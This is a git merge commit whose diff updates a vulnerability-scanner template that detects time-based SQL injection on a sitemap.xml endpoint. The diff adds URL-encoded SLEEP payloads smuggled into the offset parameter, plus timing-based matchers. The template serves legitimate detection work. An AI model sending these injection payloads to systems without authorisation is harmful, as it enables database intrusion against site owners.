Merge pull request #7648 from j4vaovo/patch-3

Update sitemap-sql-injection.yaml
2023-07-13 11:27:14 +05:30 · 2023-07-13 11:27:14 +05:30 · c60aa8f6d8
parent 09fef93f2c 94f55f8141
commit c60aa8f6d8
1 changed files with 18 additions and 5 deletions
--- a/http/vulnerabilities/other/sitemap-sql-injection.yaml
+++ b/http/vulnerabilities/other/sitemap-sql-injection.yaml
@ -2,7 +2,7 @@ id: sitemap-sql-injection

 info:
  name: Sitemap - SQL Injection
-  author: Aravind
+  author: Aravind,j4vaovo
  severity: high
  reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19
  metadata:
@ -14,13 +14,26 @@ http:
  - raw:
      - |
        @timeout: 15s
-        POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1
+        POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(6)),1,2356)# HTTP/1.1
        Host: {{Hostname}}

+      - |
+        @timeout: 25s
+        POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(16)),1,2356)# HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
-          - 'duration>=6'
-          - 'status_code == 200'
-          - 'contains(header, "application/xml") && contains(body, "sitemap>")'
+          - 'duration_1>=6'
+          - 'status_code_1 == 200'
+          - 'contains(body_1, "sitemap>")'
+        condition: and
+
+      - type: dsl
+        dsl:
+          - 'duration_2>=16'
+          - 'status_code_2 == 200'
+          - 'contains(body_2, "sitemap>")'
        condition: and